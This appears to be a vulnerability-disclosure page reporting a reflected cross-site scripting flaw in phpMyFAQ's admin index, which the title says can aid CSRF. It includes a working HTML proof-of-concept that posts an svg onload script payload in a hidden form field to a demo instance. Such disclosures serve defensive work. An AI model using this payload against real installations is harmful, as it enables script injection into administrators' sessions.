logo
DATABASE RESOURCES PRICING ABOUT US

Reflect XSS Which can help in any CSRF Vulnerability

Description

# Description Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. # Proof of Concept Below HTML code for trigger XSS with POST method ``` <html> <title>XSS POC By AggressiveUser</title> <body> <script>history.pushState('', '', '/')</script> <form action="https://roy.demo.phpmyfaq.de/admin/index.php" method="POST"> <input type="hidden" name="redirect-action" value="AggressiveUser"><svg onload=alert(112233)>" /> <center><input type="submit" value="Click Here for Trigger XSS" /> </form> </body> </html> ``` Below BurpSuite POC ![POST Method XSS](https://i.ibb.co/51bwcMf/image.png) #YO Maintainer :) Long Time No SEE !


Related